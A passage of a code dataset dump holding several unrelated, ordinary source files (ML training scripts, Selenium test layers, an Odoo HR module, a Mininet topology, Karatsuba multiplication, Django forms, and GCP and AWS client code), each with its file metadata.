RandomSampler(validation_data)\r\n        validation_dataloader = DataLoader(validation_data,\r\n                                           sampler=validation_sampler,\r\n                                           batch_size=batch_size)\r\n        return train_dataloader, validation_dataloader\r\n    else:\r\n        return train_dataloader, None  # no validation split was produced\r\n\r\ndef main():\r\n    train_dataloader, validation_dataloader = get_dataloader(args.train_data_dir)\r\n    embedding, model = mymodel_train(args, logger, train_dataloader, validation_dataloader)\r\n    test_dataloader, _ = get_dataloader(args.test_data_dir)\r\n    acc_records = mymodel_test(logger, test_dataloader)\r\n    result = mymodel_cal(logger, test_dataloader)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"relation_with_role_classify_train.py","file_name":"relation_with_role_classify_train.py","file_ext":"py","file_size_in_byte":18856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} {"seq_id":"162819408","text":"#############################################################################\n#\n# Copyright (c) 2012 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). 
A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\nfrom selenium.webdriver.firefox.firefox_profile import FirefoxProfile\nimport atexit\nimport gocept.selenium.wd_selenese\nimport os\nimport os.path\nimport selenium.webdriver\nimport sys\nimport warnings\n\n\n# work around Python 2.4 lack of absolute_import,\n# see gocept.selenium.seleniumrc for details\nplonetesting = __import__('plone.testing', {}, {}, [''])\n\n\nclass Layer(plonetesting.Layer):\n\n profile = None\n headless = False\n _browser = 'firefox'\n\n def setUp(self):\n if 'http_address' not in self:\n raise KeyError(\"No base layer has set self['http_address']\")\n\n browser = os.environ.get('GOCEPT_WEBDRIVER_BROWSER')\n headless = os.environ.get('GOCEPT_SELENIUM_HEADLESS')\n\n if headless is None or headless.lower() not in ['true', 'false']:\n warnings.warn('GOCEPT_SELENIUM_HEADLESS invalid. \\\n Possible values are true and false. Got: %s.\\\n Falling back to default (false).' %\n os.environ.get('GOCEPT_SELENIUM_HEADLESS'))\n headless = 'false'\n\n if headless.lower() == 'true':\n self.headless = True\n\n if browser is None or browser.lower() not in ['chrome', 'firefox']:\n warnings.warn('GOCEPT_WEBDRIVER_BROWSER invalid. \\\n Possible values are firefox and chrome. Got: %s.\\\n Falling back to firefox.' %\n os.environ.get('GOCEPT_WEBDRIVER_BROWSER'))\n browser = 'firefox'\n\n if browser.lower() == 'chrome':\n self._browser = 'chrome'\n else:\n self.profile = FirefoxProfile(\n os.environ.get(\n 'GOCEPT_WEBDRIVER_FF_PROFILE',\n os.environ.get('GOCEPT_SELENIUM_FF_PROFILE')))\n self.profile.native_events_enabled = True\n self.profile.update_preferences()\n\n self._start_selenium()\n atexit.register(self._stop_selenium)\n\n def tearDown(self):\n self._stop_selenium()\n # XXX upstream bug, quit should reset session_id\n self['seleniumrc'].session_id = None\n del self['seleniumrc']\n\n def _start_selenium(self):\n if self._browser == 'firefox':\n options = selenium.webdriver.FirefoxOptions()\n\n if self.headless:\n options.add_argument('-headless')\n\n self['seleniumrc'] = selenium.webdriver.Firefox(\n firefox_profile=self.profile, options=options)\n\n if self._browser == 'chrome':\n options = selenium.webdriver.ChromeOptions()\n options.add_argument('--disable-dev-shm-usage')\n\n if self.headless:\n options.add_argument('--headless')\n else:\n raise NotImplementedError(\n 'Chromedriver currently only works headless.')\n\n self['seleniumrc'] = selenium.webdriver.Chrome(\n options=options,\n service_args=['--log-path=chromedriver.log'])\n\n def _stop_selenium(self):\n # Only stop selenium if it is still active.\n if (self.get('seleniumrc') is None or\n self['seleniumrc'].session_id is None):\n return\n\n # Quit also removes the tempdir the ff profile is copied in.\n self['seleniumrc'].quit()\n\n\nclass WebdriverSeleneseLayer(plonetesting.Layer):\n\n _timeout = int(os.environ.get('GOCEPT_SELENIUM_TIMEOUT', 30))\n\n def setUp(self):\n self['selenium'] = gocept.selenium.wd_selenese.Selenese(\n self['seleniumrc'], self['http_address'], self._timeout)\n\n def testSetUp(self):\n # BBB reset settings\n self['selenium'].setTimeout(self._timeout * 1000)\n class_ = gocept.selenium.wd_selenese.Selenese\n for 
name in ['screenshot_directory', 'capture_screenshot']:\n setattr(self['selenium'], name, getattr(class_, name))\n\n def tearDown(self):\n del self['selenium']\n\n\nclass IntegrationBase(object):\n\n # hostname and port of the local application.\n host = os.environ.get('GOCEPT_SELENIUM_APP_HOST', 'localhost')\n port = int(os.environ.get('GOCEPT_SELENIUM_APP_PORT', 0))\n\n def __init__(self, *args, **kw):\n kw['module'] = sys._getframe(1).f_globals['__name__']\n super(IntegrationBase, self).__init__(*args, **kw)\n self.SELENIUM_LAYER = Layer(\n name='IntegratedSeleniumLayer', bases=[self])\n self.SELENESE_LAYER = WebdriverSeleneseLayer(\n name='IntegratedSeleneseLayer', bases=[self.SELENIUM_LAYER])\n\n def make_layer_name(self, bases):\n if bases:\n base = bases[0]\n name = '(%s.%s)' % (base.__module__, base.__name__)\n else:\n name = self.__class__.__name__\n return name\n\n def setUp(self):\n super(IntegrationBase, self).setUp()\n self.SELENIUM_LAYER.setUp()\n self.SELENESE_LAYER.setUp()\n self['seleniumrc'] = self.SELENIUM_LAYER['seleniumrc']\n\n def tearDown(self):\n self.SELENESE_LAYER.tearDown()\n self.SELENIUM_LAYER.tearDown()\n del self['seleniumrc']\n super(IntegrationBase, self).tearDown()\n\n def testSetUp(self):\n super(IntegrationBase, self).testSetUp()\n self.SELENIUM_LAYER.testSetUp()\n self.SELENESE_LAYER.testSetUp()\n self['selenium'] = self.SELENESE_LAYER['selenium']\n\n def testTearDown(self):\n self.SELENESE_LAYER.testTearDown()\n self.SELENIUM_LAYER.testTearDown()\n super(IntegrationBase, self).testTearDown()\n\n\nclass WebdriverSeleneseTestCase(object):\n\n @property\n def selenium(self):\n return self.layer['selenium']\n","sub_path":"src/gocept/selenium/webdriver.py","file_name":"webdriver.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"183949983","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, exceptions\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n# TODO: All HR fields integrated to partner and user: Address\n# TODO: Separate Employee and Personal information.\n# STARTED: Force Employees to have partner records.\n# TODO: On install, search for mismatched fields and ask the user which to keep.\n# TODO: On install search for records with matching names and ask if the user would like to link. 
This should be optional.\n# TODO: Separate work and personal records and persist data\n\nclass Users(models.Model):\n\t_inherit = 'res.users'\n\n\thr_id = fields.Many2one(related=\"partner_id.hr_id\", inherited=True)\n\n\t# Automatically create an employee record when you create a user with any of the HR group permissions.\n\t@api.model\n\tdef create(self, vals):\n\t\tres = super(Users, self).create(vals)\n\t\tnew_rec = self.browse(res.id)\n\t\thr_cat = self.env['ir.module.category'].search([('name', '=like', 'Human Resources')]).id\n\t\thr_groups = self.env['res.groups'].search([('category_id', '=', hr_cat)]).ids\n\n\t\t# Check to see if the new rec is in any of the employee permissions groups\n\t\tfor rec in new_rec.groups_id.ids:\n\t\t\t# If it is run the inner function\n\t\t\tif rec in hr_groups:\n\t\t\t\tnew_vals = {'user_id': res.id, 'name': res.name}\n\t\t\t\t\n\t\t\t\tdef create_employee(new_vals):\n\t\t\t\t\t# Create an employee record\n\t\t\t\t\tnew_res = self.env['hr.employee'].create(new_vals)\n\t\t\t\t\t# Sets hr_id field of user rec's associated partner to the new employee(hr) record\n\t\t\t\t\tnew_rec.partner_id.hr_id = new_res.id\n\t\t\t\t\treturn new_res\n\n\t\t\t\t# To prevent recursion, make sure an employee doesn't already exist\n\t\t\t\tif new_rec.partner_id.hr_id.id == False:\n\t\t\t\t\tcreate_employee(new_vals)\n\n\t\t\t\tbreak\n\t\treturn res\n\n\t# If the user name and employee name aren't equal, set the employee name to the user name.\n\t@api.multi\n\tdef write(self, vals):\n\t\tres = super(Users, self).write(vals)\n\t\tfor rec in self:\n\t\t\tif rec.hr_id.id != False and rec.hr_id.name != rec.name:\n\t\t\t\trec.hr_id.write({'name': rec.name})\n\t\treturn res\n\nclass Employee(models.Model):\n\t_inherit = 'hr.employee'\n\n\tpartner_id = fields.Many2one('res.partner', related='user_id.partner_id')\n\tstreet = fields.Char('Street', related='partner_id.street')\n\tstreet2 = fields.Char('Street2', related='partner_id.street2')\n\tzip = fields.Char('Zip', size=24, change_default=True, related='partner_id.zip')\n\tcity = fields.Char('City', related='partner_id.city')\n\tstate_id = fields.Many2one('res.country.state', 'State', related='partner_id.state_id', ondelete='restrict')\n\tcountry_id = fields.Many2one('res.country', 'Country', related='partner_id.country_id', ondelete='restrict')\n\tphone = fields.Char(\"Personal Phone\", related=\"partner_id.phone\")\n\temail = fields.Char(\"Personal Email\", related=\"partner_id.email\")\n\tmobile = fields.Char(related=\"partner_id.mobile\")\n\twork_phone = fields.Char(\"Work Phone\")\n\twork_email = fields.Char(\"Work Email\")\n\timage = fields.Binary(related=\"partner_id.image\")\n\timage_small = fields.Binary(related=\"partner_id.image_small\")\n\timage_medium = fields.Binary(related=\"partner_id.image_medium\")\n\n\n\t# If the employee name and partner name aren't equal, set the partner name to equal the employee name\n\t# Cascades to user name\n\t@api.multi\n\tdef write(self, vals):\n\t\tres = super(Employee, self).write(vals)\n\t\tfor rec in self:\n\t\t\tif rec.user_id.id != False and rec.partner_id.name != rec.name:\n\t\t\t\trec.partner_id.write({'name': rec.name})\n\t\treturn res\n\n\t@api.onchange('user_id')\n\t@api.multi\n\tdef set_user_id_hr_id(self):\n\t\tfor rec in self:\n\t\t\t# Set hr_id when changing the user_id.\n\t\t\tif rec.user_id.partner_id.id and rec.user_id.partner_id.hr_id.id != rec.id:\n\t\t\t\trec.user_id.partner_id.hr_id = rec.id\n\t\t\t# Automatically set the company of the partner to the user's 
company\n\t\t\tif rec.user_id.id != False and rec.user_id.partner_id.parent_id != rec.user_id.company_id:\n\t\t\t\trec.user_id.partner_id.parent_id = rec.user_id.company_id.id\n\n\t# Run set_user_id_hr_id for all records\n\t@api.multi\n\tdef set_all_user_id_hr_id(self):\n\t\tfor rec in self.search([]):\n\t\t\trec.set_user_id_hr_id()\n\n\t# Test if there are inequalities between fields of already linked records\n\t@api.multi\n\tdef compare_fields(self):\n\t\tfields = ['name',\n\t\t\t'street',\n\t\t\t'street2',\n\t\t\t'zip',\n\t\t\t'city',\n\t\t\t'state_id',\n\t\t\t'country_id',\n\t\t\t'phone',\n\t\t\t'email',\n\t\t\t'mobile',\n\t\t\t'image',\n\t\t\t]\n\t\tfor employee in self:\n\t\t\tineq_fields = []\n\t\t\tfor field in fields:\n\t\t\t\temployee_field = getattr(employee, field)\n\t\t\t\tpartner_field = getattr(employee.partner_id, field)\n\t\t\t\tif employee_field != partner_field:\n\t\t\t\t\tineq_fields.append(field)\n\t\t\tif ineq_fields:\n\t\t\t\treturn ineq_fields\n\t\t\telse:\n\t\t\t\treturn\n\n\t# Run compare_fields for all currently linked records\n\t@api.multi\n\tdef compare_all_fields(self):\n\t\tineq = {}\n\t\tfor rec in self.search([('user_id.id', '!=', False)]):\n\t\t\tcompare = rec.compare_fields()\n\t\t\tif compare:\n\t\t\t\tineq[rec] = compare\n\t\tif ineq:\n\t\t\treturn ineq\n\t\telse:\n\t\t\treturn\n\n\t# Methods to run on module installation\n\t@api.model\n\tdef on_install(self):\t\n\t\t# self.set_all_user_id_hr_id()\n\t\t# todo = self.env['ir.actions.todo']\n\t\t# action_rec = self.env['ir.model.data'].xmlid_to_object('hr_auto_create.action_hr_auto_installer')\n\t\t# _logger.info('OVER 9000')\n\t\t# if action_rec:\n\t\t# \ttodo_rec = todo.create({'action_id': action_rec.id, 'name': 'Comparison Results', 'type': 'automatic'})\n\t\treturn\n\t\t\n\nclass Partner(models.Model):\n\t_inherit = 'res.partner'\n\n\tfunction = fields.Char(compute=\"_get_function\", store=True)\n\tdisp_function = fields.Char('Job Position')\n\thr_id = fields.Many2one('hr.employee')\n\thr_function = fields.Many2one('hr.job', related='hr_id.job_id')\t\n\n\t# If the partner name and employee name aren't equal, set the employee name to the partner name.\n\t@api.multi\n\tdef write(self, vals):\n\t\tres = super(Partner, self).write(vals)\n\t\tfor rec in self:\n\t\t\tif rec.hr_id.id != False and rec.hr_id.name != rec.name:\n\t\t\t\trec.hr_id.write({'name': rec.name})\n\t\treturn res\n\n\t# Sets function field to employee function or character field depending on whether there's a linked HR rec.\n\t@api.depends('hr_function', 'disp_function', 'hr_id.job_id')\n\t@api.multi\n\tdef _get_function(self):\n\t\tfor rec in self:\n\t\t\trec.function = ''\n\t\t\tif rec.hr_function.id != False:\n\t\t\t\trec.function = '%s'%rec.hr_function.name\n\t\t\telif rec.disp_function != False:\n\t\t\t\trec.function = rec.disp_function\n\t\t\telse:\n\t\t\t\treturn\n\n\n\t# This is an example of how to do something only if iterating through a list doesn't return what you want.\n\t# @api.multi\n\t# def parse_conflicting_fields(self):\n\t# \tfields = ('name',\n\t# \t\t'street',\n\t# \t\t'street2',\n\t# \t\t'zip',\n\t# \t\t'city',\n\t# \t\t'state_id',\n\t# \t\t'country_id',\n\t# \t\t'phone',\n\t# \t\t'email',\n\t# \t\t'mobile',\n\t# \t\t'image',\n\t# \t\t)\n\t# \tfor employee in self:\n\t# \t\tineq_fields = []\n\t# \t\tfor field in fields:\n\t# \t\t\temployee_field = getattr(employee, field)\n\t# \t\t\tpartner_field = getattr(employee.partner_id, field)\n\t# \t\t\tif employee_field != partner_field:\n\t# 
\t\t\t\t_logger.info('Inequality for %s.%s'%(employee,field))\n\t# \t\t\t\tineq_fields.append(field)\n\t# \t\t\telse:\n\t# \t\t\t\tcontinue\n\t# \t\telse:\n\t# \t\t\tif not ineq_fields:\n\t# \t\t\t\t_logger.info('No inequalities found for %s'%employee)\n\t# \t\t\telse:\n\t# \t\t\t\treturn ineq_fields\n\n\n","sub_path":"models/hr_auto_create.py","file_name":"hr_auto_create.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"345081572","text":"from mininet.topo import Topo\r\nfrom mininet.net import Mininet\r\nfrom mininet.node import CPULimitedHost\r\nfrom mininet.link import TCLink\r\nfrom mininet.util import dumpNodeConnections\r\nfrom mininet.log import setLogLevel\r\nfrom mininet.cli import CLI\r\n\r\n\r\nclass SingleSwitchTopo(Topo):\r\n \"Single switch connected to n hosts.\"\r\n\r\n def __init__(self, n=2, **opts):\r\n Topo.__init__(self, **opts)\r\n switch = self.addSwitch('s1')\r\n for h in range(n):\r\n # Each host gets 50%/n of system CPU\r\n host = self.addHost('h%s' % (h + 1))\r\n # 10 Mbps, 5ms delay, 0% Loss, 1000 packet queue\r\n self.addLink(host, switch, bw=10, delay='5ms', loss=0, max_queue_size=1000, use_htb=False)\r\n\r\n\r\ndef perfTest():\r\n \"Create network and run simple performance test\"\r\n topo = SingleSwitchTopo(n=4)\r\n net = Mininet(topo=topo, link=TCLink)\r\n net.start()\r\n # print(\"Dumping host connections\")\r\n # dumpNodeConnections(net.hosts)\r\n # print(\"Testing network connectivity\")\r\n # net.pingAll()\r\n # print(\"Testing bandwidth between h1 and h4\")\r\n # h1, h4 = net.get('h1', 'h4')\r\n # net.iperf((h1, h4))\r\n CLI(net)\r\n net.stop()\r\n\r\n\r\nif __name__ == '__main__':\r\n setLogLevel('info')\r\n perfTest()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"204824456","text":"from keras.models import Sequential\nfrom keras import layers\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom keras.models import Sequential\nfrom keras import layers\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfilepath_dict = {'yelp': 'sentiment_analysis/yelp_labelled.txt',\n 'amazon': 'sentiment_analysis/amazon_cells_labelled.txt',\n 'imdb': 'sentiment_analysis/imdb_labelled.txt'}\ndf_list = []\nfor source, filepath in filepath_dict.items():\n df = pd.read_csv(filepath, names=['sentence', 'label'], sep='\\t')\n df['source'] = source # Add another column filled with the source name\n df_list.append(df)\ndf = pd.concat(df_list)\nprint(df.iloc[0])\n\n\ndf_yelp = df[df['source'] == 'yelp']\n\nsentences = df_yelp['sentence'].values\ny = df_yelp['label'].values\n\nsentences_train, sentences_test, y_train, y_test = train_test_split(\n sentences, y, test_size=0.25, random_state=1000)\n\n\ntokenizer = Tokenizer(num_words=5000)\ntokenizer.fit_on_texts(sentences_train)\n\nX_train = tokenizer.texts_to_sequences(sentences_train)\nX_test = tokenizer.texts_to_sequences(sentences_test)\ntest_sent = [\"This movie was nearly perfect. 
I only had one complaint.\"]\ntest = tokenizer.texts_to_sequences(test_sent)\nprint(test_sent)\nprint(test)\nprint(\"---------------------------\")\nvocab_size = len(tokenizer.word_index) + 1 # Adding 1 because of reserved 0 index\n\nprint(sentences_train[2])\nprint(X_train[2])\n\nmaxlen = 100\n\nX_train = pad_sequences(X_train, padding='post', maxlen=maxlen)\nX_test = pad_sequences(X_test, padding='post', maxlen=maxlen)\ntest = pad_sequences(test, padding='post', maxlen=maxlen)\n\ndef create_embedding_matrix(filepath, word_index, embedding_dim):\n vocab_size = len(word_index) + 1 # Adding again 1 because of reserved 0 index\n embedding_matrix = np.zeros((vocab_size, embedding_dim))\n\n with open(filepath,'r', encoding='UTF8') as f:\n for line in f:\n word, *vector = line.split()\n if word in word_index:\n idx = word_index[word]\n embedding_matrix[idx] = np.array(\n vector, dtype=np.float32)[:embedding_dim]\n\n return embedding_matrix\nembedding_dim = 50\nembedding_matrix = create_embedding_matrix(\n 'glove.6B.50d.txt',\n tokenizer.word_index, embedding_dim)\n\n\nmodel = Sequential()\nmodel.add(layers.Embedding(vocab_size, embedding_dim,\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=True))\nmodel.add(layers.Conv1D(128, 5, activation='relu'))\nmodel.add(layers.GlobalMaxPooling1D())\nmodel.add(layers.Dense(10, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\nhistory = model.fit(X_train, y_train,\n epochs=10,\n verbose=False,\n validation_data=(X_test, y_test),\n batch_size=10)\nloss, accuracy = model.evaluate(X_train, y_train, verbose=False)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy))\nloss, accuracy = model.evaluate(X_test, y_test, verbose=False)\nprint(\"Testing Accuracy: {:.4f}\".format(accuracy))\nynew = model.predict_classes(test)\nprint(ynew)\nfor i in range(len(test)):\n\tprint(\"X=%s, Predicted=%s\" % (test[i], ynew[i]))\nynew = model.predict_proba(test)\nfor i in range(len(test)):\n\tprint(\"X=%s, Predicted=%s\" % (test[i], ynew[i]))","sub_path":"testCNN/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"622596402","text":"import arcpy, sys, os\r\n\r\n#Set up variables\r\narcpy.env.overwriteOutput = True\r\ninputfile = sys.argv[1]\r\noutputfile = os.path.dirname(inputfile) + \"/\" + \"outPoints.shp\"\r\n\r\n#Find a point based on the input\r\narcpy.FeatureToPoint_management(inputfile, outputfile)\r\n\r\n##Set the output parameter\r\n\r\n\r\n","sub_path":"example_scripts/feature2point.py","file_name":"feature2point.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"461560247","text":"#coding=utf-8\n# author: Huan Shuwen\n# time : 2019/12/17 下午2:43\n# file : mine\n\"\"\"\nNOTICE:\n匹配最长前缀\n1、暴力,一个字母一个字母往后尝试\n2、折半对比:以最短的字符串为基础,对比前半段,然后再折半\n# 扩展,如果是最长子串呢?\n\"\"\"\nimport numpy as np\ndef longest_prefix(list):\n shortest_str_index = np.argmin(map(lambda x:len(x),list))\n shortest_str=list[shortest_str_index]\n head_point = 0\n tail_point = len(shortest_str)/2+1\n max_tail_point = 0\n # 终止条件:\n while head_point 0 else 0,\n (dp[i - 2] if i > 1 else 0) + nums[i])\n return dp[-1]\n\n\n# 简化版\ndef _solve1(nums):\n last = now = 0\n for num in nums:\n last, now = now, max(now, last + num)\n return now\n\n\nif __name__ == 
'__main__':\n print (_solve1([]))\n print (_solve1([1]))\n print (_solve1([2, 6, 3, 2, 2]))\n","sub_path":"easy/198.py","file_name":"198.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"648826054","text":"from otma.apps.core.commons.validators import email_dangerous_symbols_validator, email_format_validator\nfrom django.conf import settings\nfrom django import forms\n\n\nclass FieldFirstName(forms.Form):\n first_name = forms.CharField(\n label=\"Primeiro nome\",\n max_length=30,\n required=True,\n error_messages=settings.ERRORS_MESSAGES,\n widget=forms.TextInput(\n attrs={\n 'id': 'first_name','name':'first_name', 'class': \"form-control\", 'v-model':'first_name', 'type': 'text',\n 'autocomplete': \"off\",'required': \"required\",\n }\n )\n )\n\n\nclass FieldFamilyName(forms.Form):\n family_name = forms.CharField(\n label=\"Sobrenome\",\n max_length=30,\n required=True,\n error_messages=settings.ERRORS_MESSAGES,\n widget=forms.TextInput(\n attrs={\n 'id': 'family_name','name':'family_name', 'class': \"form-control\", 'v-model':'family_name', 'type': 'text',\n 'autocomplete': \"off\",'required': \"required\",\n }\n )\n )\n\n\nclass FieldEmail(forms.Form):\n email = forms.EmailField(\n label=\"Email\",\n max_length=256,\n required=True,\n validators=[email_format_validator, email_dangerous_symbols_validator],\n error_messages=settings.ERRORS_MESSAGES,\n widget=forms.TextInput(\n attrs={\n 'type': \"text\", 'class': \"form-control text-lowercase\", 'id': 'email',\n 'v-model': 'email', 'autocomplete': \"off\", 'placeholder': \"\",'required': \"true\"\n }\n )\n )","sub_path":"otma/apps/core/commons/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"459888516","text":"# USAGE\n# python test_network.py --model santa_not_santa.model --image examples/santa_01.png\n# python test_network.py --model furnace_not_furnace.model --image examples/santa_01.png\n# import the necessary packages\n\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport googleapiclient.discovery\nfrom apiclient import discovery\nfrom google.api_core.client_options import ClientOptions\nimport os\n\nroot_path = os.path.dirname(os.path.abspath(__file__))\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = root_path+\"/My First Project-580d9a3220f1.json\" #API\n\n\n\ndef predict_json(project, region, model, instances, version=None):\n \"\"\"Send json data to a deployed model for prediction.\n\n Args:\n project (str): project where the Cloud ML Engine Model is deployed.\n region (str): regional endpoint to use; set to None for ml.googleapis.com\n model (str): model name.\n instances ([Mapping[str: Any]]): Keys should be the names of Tensors\n your deployed model expects as inputs. 
Values should be datatypes\n            convertible to Tensors, or (potentially nested) lists of datatypes\n            convertible to tensors.\n        version: str, version of the model to target.\n    Returns:\n        Mapping[str: any]: dictionary of prediction results defined by the\n            model.\n    \"\"\"\n    # Create the ML Engine service object.\n    # To authenticate set the environment variable\n    # GOOGLE_APPLICATION_CREDENTIALS=<path_to_service_account_file>\n    prefix = \"{}-ml\".format(region) if region else \"ml\"\n    api_endpoint = \"https://{}.googleapis.com\".format(prefix)\n    client_options = ClientOptions(api_endpoint=api_endpoint)\n    service = googleapiclient.discovery.build(\n        'ml', 'v1', client_options=client_options)\n    name = 'projects/{}/models/{}'.format(project, model)\n\n    if version is not None:\n        name += '/versions/{}'.format(version)\n\n    response = service.projects().predict(\n        name=name,\n        body={'instances': instances}\n    ).execute()\n\n    print(response)\n\n    if 'error' in response:\n        raise RuntimeError(response['error'])\n\n    return response['predictions']\n\n\n\n\ndef is_furnace(image_array):\n    # pre-process the image for classification\n\n\n    prediction = predict_json('trusty-moment-288519','us-central1', 'furnace_not_furnace', image_array)\n\n\n    # classify the input image\n    (not_furnace, furnace) = prediction[0]\n    print(furnace)\n\n    # build the label\n    label = \"Furnace\" if furnace > not_furnace else \"Not Furnace\"\n    proba = furnace if furnace > not_furnace else not_furnace\n\n    return [label,proba]\n","sub_path":"benchmarking_tool/furnace_detect.py","file_name":"furnace_detect.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} {"seq_id":"613122471","text":"\"\"\"\n    Simple Karatsuba multiplication\n\"\"\"\n\n\nclass Multiply:\n    \"\"\"\n    This class implements Karatsuba multiplication using a\n    recursive approach\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def _pad_zeros(num: str, n_zeros: int, at_front=False) -> str:\n        \"\"\"\n        takes in a string, returns padded string (at end or front)\n        \"\"\"\n        zeros = '0' * n_zeros\n        if at_front:\n            return zeros + num\n        return num + zeros\n\n    def recursive_karatsuba_multiplication(self, num1: int, num2: int) -> int:\n        \"\"\"\n        Takes in 2 integers, multiplies them recursively using\n        karatsuba multiplication formula\n        \"\"\"\n        num1, num2 = str(num1), str(num2)\n        len_num1 = len(num1)\n        len_num2 = len(num2)\n        if len_num1 != len_num2:\n            if len_num1 > len_num2:\n                num2 = Multiply._pad_zeros(\n                    str(num2), len_num1 - len_num2, at_front=True)\n            else:\n                num1 = Multiply._pad_zeros(\n                    str(num1), len_num2 - len_num1, at_front=True)\n        # length may have changed here.\n        # However, we now have both num1 and num2 of same length\n        len_num = len(num1)\n\n        if len_num == 1:\n            return int(num1) * int(num2)\n\n        # split the num1, num2 into a, b, c, d\n        a_s, b_s = num1[:len_num // 2], num1[len_num // 2:]\n        c_s, d_s = num2[:len_num // 2], num2[len_num // 2:]\n        a, b, c, d = int(a_s), int(b_s), int(c_s), int(d_s)\n\n        # step1: compute ac\n        ac = self.recursive_karatsuba_multiplication(a, c)\n        # step2: compute bd\n        bd = self.recursive_karatsuba_multiplication(b, d)\n        # step3 (Gauss trick): compute (a + b) * (c + d) to recover ad + bc\n        ab_bc = self.recursive_karatsuba_multiplication((a + b), (c + d))\n        ab_bc -= ac + bd\n\n        # KARATSUBA formula\n        # ac (with padded zeros on right) \\\n        # + ab_bc (with padded zeros on right) + bd\n\n        # output = int(\n        #     Multiply._pad_zeros(str(ac), 2 * (len_num - len_num // 2),\n        #                         at_front=False))\n        # output += int(\n        #     
Multiply._pad_zeros(str(ab_bc), len_num - len_num//2,\n # at_front=False))\n # output += bd\n\n # KARATSUBA formula\n # x.y = ((10 ^n) * ac) + ((10^(n/2)) * (ab+bc)) + bd\n output = ac * (10 ** (2 * (len_num - (len_num // 2))))\n output += ab_bc * (10 ** (len_num - (len_num // 2)))\n output += bd\n return output\n\n def iterative_karatsuba_multiplication(self, num1, num2):\n \"\"\"\n takes in 2 numbers, returns product using iterative\n karatsuba approach\n \"\"\"\n raise NotImplementedError\n\n\nif __name__ == \"__main__\":\n multiply_obj = Multiply()\n # n1 = 1234\n # n2 = 5678\n n1 = 123456\n n2 = 56789\n # n1 = 3141592653589793238462643383279502884197169399375105820974944592\n # n2 = 2718281828459045235360287471352662497757247093699959574966967627\n recursive_output = multiply_obj.recursive_karatsuba_multiplication(n1, n2)\n\n print('num1', n1)\n print('num2', n2)\n print('recursive_output output', recursive_output)\n","sub_path":"Divide_and_Conquer_Algos_Course_1/karatsuba.py","file_name":"karatsuba.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"231099420","text":"import time\nimport sys\n\ndef plotter_sim(slp_time):\n print(\"Fake plotter will now sleep for {0} seconds.\\n\".format(str(slp_time)))\n time.sleep(slp_time)\n print(\"Done plotting sim\\n\")\n\n return\n\nif __name__ == '__main__':\n plotter_sim(float(sys.argv[1]))\n","sub_path":"tests/plotter_sim.py","file_name":"plotter_sim.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"316631857","text":"import json\r\nimport os\r\nimport boto3\r\nimport requests\r\nfrom aws_requests_auth.aws_auth import AWSRequestsAuth\r\n\r\n# Assume Roleを使用して取得する別アカウントのRole名\r\nROLE = 'arn:aws:iam::{}:role/ys-dev-web-apigateway-role'.format(os.environ['ASSUME_ACCOUNT_ID'])\r\nAPIGATEWAY_DOMAIN = os.environ['APIGATEWAY_DOMAIN']\r\nAPI_URL = 'https://{}/prod/'.format(APIGATEWAY_DOMAIN)\r\n\r\nsts_client = boto3.client('sts')\r\n\r\ndef lambda_handler(event, context):\r\n # stsにて、Lambda自身のRoleから一時認証情報を取得する\r\n response = sts_client.assume_role(\r\n RoleArn=ROLE,\r\n RoleSessionName='test'\r\n )\r\n credentials=response['Credentials']\r\n\r\n # HTTPリクエストで認証情報が送れるように、AWSRequestsAuthを使用する\r\n auth = AWSRequestsAuth(\r\n aws_access_key=credentials['AccessKeyId'],\r\n aws_secret_access_key=credentials['SecretAccessKey'],\r\n aws_token=credentials['SessionToken'],\r\n 